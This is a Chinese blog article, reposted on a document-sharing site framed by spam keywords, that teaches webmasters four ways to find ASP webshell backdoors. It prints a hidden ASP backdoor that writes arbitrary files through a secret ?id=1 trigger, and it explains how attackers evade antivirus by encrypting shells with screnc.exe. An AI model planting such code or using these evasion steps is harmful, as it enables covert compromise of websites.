欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費電子書(shū)等14項超值服

開(kāi)通VIP
徹底找出WEB空間中的ASP后門(mén)!
徹底找出WEB空間中的ASP后門(mén)!
2007-01-09 14:31

【簡(jiǎn) 介】
  前一段時(shí)間以來(lái),動(dòng)網(wǎng)爆出了好幾個(gè)重量級別的漏洞,個(gè)個(gè)都能導致入侵者在web空間中放置asp木馬,asp木馬可是網(wǎng)站管理員非常頭疼的東西,它隱蔽性高、功能強,再加上不斷翻新的種類(lèi)來(lái)逃避殺毒軟件,一旦web空間被放置了不同種類(lèi)的asp木馬,那么清除起來(lái)非常麻煩,很多朋友在細心整理web空間之后,仍然將asp木馬驅之不盡,只有更換了全部的web文件,非常無(wú)奈!

前一段時(shí)間以來(lái),動(dòng)網(wǎng)爆出了好幾個(gè)重量級別的漏洞,個(gè)個(gè)都能導致入侵者在web空間中放置asp木馬,asp木馬可是網(wǎng)站管理員非常頭疼的東西,它隱蔽性高、功能強,再加上不斷翻新的種類(lèi)來(lái)逃避殺毒軟件,一旦web空間被放置了不同種類(lèi)的asp木馬,那么清除起來(lái)非常麻煩,很多朋友在細心整理web空間之后,仍然將asp木馬驅之不盡,只有更換了全部的web文件,非常無(wú)奈! 

網(wǎng)上的一些防范asp木馬的教程都基于提前防范的基礎之上,例如:禁止FSO,利用NTFS限制用戶(hù)目錄等等。這些方法雖然有效,但是都是基于提前防范的,而且對于一般的買(mǎi)空間來(lái)做網(wǎng)站的朋友來(lái)說(shuō)顯然不可能。我在這里講講如何有效的發(fā)現web空間中的asp木馬并清除。 

通過(guò)幫朋友整理web空間摸索出了一些技巧,這些技巧還挺管用,不敢獨享,拿出來(lái)共享。 

一.技巧1:殺毒軟件查殺 

一些朋友可能在成功得到上傳權限之后,上傳的asp木馬是一些非常有名的asp木馬,例如:cmdasp,海洋頂端木馬,這些木馬雖然功能強大,但是早已經(jīng)被殺毒軟件列入了黑名單,所以利用殺毒軟件對web空間中的文件進(jìn)行掃描,可以有效的發(fā)現并清除這些有名的asp木馬。這是我利用瑞星殺毒軟件在web目錄中查殺到的一個(gè)asp木馬,木馬標注為:Script.ASP.Rootkit.10.a,在瑞星的網(wǎng)站上搜索一下,可以知道這就是海洋頂端木馬。 

利用這種方法,可以有效的對抗一些小菜上傳的asp木馬,效果明顯。 

二.技巧2:FTP客戶(hù)端對比 

上面的方法雖然對菜鳥(niǎo)入侵者比較管用,但是遇到稍微有點(diǎn)意識的入侵者來(lái)說(shuō),幾乎失去效果,因為他們完全可以對asp木馬進(jìn)行偽裝,加密,使其躲藏殺毒軟件,這樣的手法比較多,我個(gè)人比較喜歡微軟開(kāi)發(fā)個(gè)的一個(gè)asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比較安全,使代碼完全改變,使用也非常簡(jiǎn)單。只需要在命令下輸入: 

screnc.exe,得到幫助命令:Usage: screnc [/?] [/s] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根據提示,只需要輸入:screnc.exe 要加密的asp木馬名 輸出的asp木馬名,就可以完成加密偽裝。 

經(jīng)過(guò)加密之后,記事本打開(kāi)查看,可以看到標簽:〈% ……%〉,〈script〉〈/script〉 

等標簽內的代碼成為一些“亂碼”,而殺毒軟件查殺asp木馬是通過(guò)搜索關(guān)鍵字來(lái)查殺,著(zhù)阿姨能夠顯然就躲過(guò)查殺。 

盛大官方網(wǎng)站被黑,掛的網(wǎng)頁(yè)木馬代碼就是利用screnc.exe來(lái)加密的,過(guò)了好幾天才被發(fā)現,可見(jiàn)加密偽裝手法的高超。 

所以要采取另外的措施對付這種加密偽裝的asp木馬,我們可以利用一些FTP客戶(hù)端軟件(例如cuteftp,FlashFXP)提供的文件對比功能,通過(guò)對比FTP的中的web文件和本地的備份文件,發(fā)現是否錯出可疑文件。 

這里以FlashFXP進(jìn)行操作講解。 

步驟1:打開(kāi)FlashFXP,在左邊窗口中跳轉到本地web備份文件目錄,在右邊的FTP窗口中跳轉到web目錄下。 

步驟2:點(diǎn)工具欄中的“工具”,選擇其中的“比較文件夾命令”,即可進(jìn)行對比文件夾,速度非???。 

我們可以清楚的看到196個(gè)對象被過(guò)濾,在FTP空間中多出了這樣幾個(gè)asp文件:.asp,2005.asp等,這十有八九就是入侵者留下的asp后門(mén),打開(kāi)確認一下即可。

 

三.技巧3:用Beyond Compare 2進(jìn)行對比 

上面的利用FTP客戶(hù)端對比文件的方法,雖然有效,但是遇到滲透入文件的asp木馬,那就無(wú)能為力了,這里介紹一款滲透性asp木馬,可以將代碼插入到指定web文件中,平常情況下不會(huì )顯示,只有使用觸發(fā)語(yǔ)句才能打開(kāi)asp木馬,其隱蔽性非常高。代碼如下: 

〈% 

on error resume next 

id=request("id") 

if request("id")=1 then 

testfile=Request.form("name") 

msg=Request.form("message") 

set fs=server.CreatObject("scripting.filesystemobject") 

set thisfile=fs.openTestFile(testfile,8,True,0) 

thisfile.Writeline(""&msg&"") 

thisfile.close 

set fs=nothing 

%〉 

〈from method="post" Action="保存"?id=1〉 

〈input type="text" size="20" name="Name" 

Value=〈%=server.mappath("XP.ASP")%〉〉 

〈textarea name="Message" class=input〉 

〈/textarea〉 

〈input type="Submit" name="send" Value="生成" 

class=input〉 

〈/from〉 

〈%end if%〉 

注意:在修改目標主機的web文件時(shí),要注意這樣的文件修改后沒(méi)有效果,即含有類(lèi)似于:〈!--#include file="inc/conn.asp"--〉這樣的文件包含命令,這樣的代碼存在時(shí),加入asp代碼后根本不會(huì )顯示出腳本后門(mén),但是腳本后門(mén)代碼不會(huì )影響原文件的顯示和功能。 

假如已經(jīng)對目標服務(wù)器www.target.com下的一個(gè)editor_InsertPic.asp文件進(jìn)行了修改,插入了腳本后門(mén)代碼,那么打開(kāi)的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后門(mén)的字符?id=1,有了這些字符,才能保證腳本后門(mén)顯示出來(lái)!普通情況下打開(kāi)www. target..com/editor_InsertPic.asp?id=1,是不會(huì )露出破綻的。 

這招真是asp木馬放置中非常狠的,如果遇到這樣的情況,該怎么辦?我們可以利用一款專(zhuān)業(yè)的文件對比工具Beyond Compare 2來(lái)完成木馬的查找。 

Beyond Compare 2一款不可多得的專(zhuān)業(yè)級的文件夾和文件對比工具。使用它可以很方便的對比出兩個(gè)文件夾或者文件的不同之處。并把相差的每一個(gè)字節用顏色加以表示,查看方便。并且支持多種規則對比。

        看我來(lái)利用它完成滲透性asp木馬的查找。 

步驟1:打開(kāi)Beyond Compare 2,點(diǎn)工具欄中的“比較任務(wù)”,選擇其中的選項:新建,在“比較模式”中選擇“比較兩個(gè)文件夾”。進(jìn)入一下步,選擇需要對比的兩個(gè)文件夾路徑,即備份過(guò)的網(wǎng)站文件以及從FTP上下載的網(wǎng)站文件,再在下面的“文件過(guò)濾器”中選擇“包括所有文件”。在“比較范圍”中選擇“文件大小”。設置完畢即可開(kāi)始比較。 

步驟2:比較完畢,軟件界面左右兩邊分別顯示了比較的結果,從中可以很容易找到哪個(gè)目錄多出了什么文件。 

步驟3:文件名相同,但是大小不同的文件,會(huì )被軟件用另外的顏色標注出來(lái),選擇上它們,然后選擇工具欄的“操作”中的“比較內容”功能,即可展開(kāi)兩個(gè)文件的詳細內容,從中我們可以看到FTP端的文件被插入了滲透asp木馬。這下很容易找到了吧! 

 

四.技巧4:利用組件性能找asp木馬 

上面分門(mén)別類(lèi)的介紹了幾種asp木馬的放置與查殺技巧,一般的菜鳥(niǎo),老鳥(niǎo)恐怕都是利用上面的方法來(lái)放置asp木馬吧!所以可以有效的對抗web空間中上傳的asp木馬。這下可以高枕無(wú)憂(yōu)了吧?呵呵!先別急,還有一種BT的asp木馬放置方法,你可能很難想到,放置思路是這樣的:在目標web空間中尋找一個(gè)不常用的,比較合適的asp文件,打開(kāi)它對其進(jìn)行代碼精簡(jiǎn),然后再將滲透asp木馬的代碼插入,再對其進(jìn)行精簡(jiǎn),直至與原本的文件大小一樣。最后利用加密偽裝的手法對其進(jìn)行處理。這樣就徹底練就了一個(gè)絕對隱藏的asp木馬后門(mén),一般的入侵者恐怕很難做到這一點(diǎn),因為要精簡(jiǎn)代碼的同時(shí)還要保證asp木馬的功能不會(huì )錯誤。 

如果你恰恰遇到一個(gè)這樣的入侵者,那么該怎么才能查出被他放置的asp木馬呢?你可能認為這已經(jīng)不太可能了,呵呵!完全可能,看我拿出寶貝來(lái):思易asp木馬追捕。 

它是一款專(zhuān)門(mén)檢索各種asp文件所帶功能的asp軟件,通過(guò)搜索asp木馬含有的特殊字符,以及搜索利用變量創(chuàng )建對象及靜態(tài)對象建立的代碼,來(lái)找出可能含有疑點(diǎn)的asp文件,從而有效的防范asp木馬。 

使用非常簡(jiǎn)單,只需要將文件asplist2.0.asp上傳到web空間下,然后在地址攔中打開(kāi),就完成了所有asp文件的檢索??梢钥闯鏊峭ㄟ^(guò)查找各個(gè)asp文件的功能來(lái)確認是否為asp木馬,這些功能也都是asp木馬常用的:FSO,WS,SHELL,XML等等。 

一般的web文件很少具有這樣的功能,只有那些可惡的asp木馬才具有,可以看到一些文件具備了相當多的功能,這時(shí)候,就可以打開(kāi)這些文件來(lái)確認是否是asp木馬,非常有效。 

大家在查找web空間的asp木馬時(shí),最好幾種方法結合起來(lái),這樣就能有效的查殺被隱藏起來(lái)的asp木馬。

本站僅提供存儲服務(wù),所有內容均由用戶(hù)發(fā)布,如發(fā)現有害或侵權內容,請點(diǎn)擊舉報。
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
用簡(jiǎn)單的asp木馬來(lái)找asp木馬后門(mén)
網(wǎng)站被黑中毒W(wǎng)ebShell木馬的解決方案
什么是 webshell ?丨基礎
網(wǎng)絡(luò )安全入門(mén)基礎知識
ewebeditor編輯器防入侵
手動(dòng)清除軟件木馬后門(mén)程序的小技巧
更多類(lèi)似文章 >>
生活服務(wù)
分享 收藏 導長(cháng)圖 關(guān)注 下載文章
綁定賬號成功
后續可登錄賬號暢享VIP特權!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久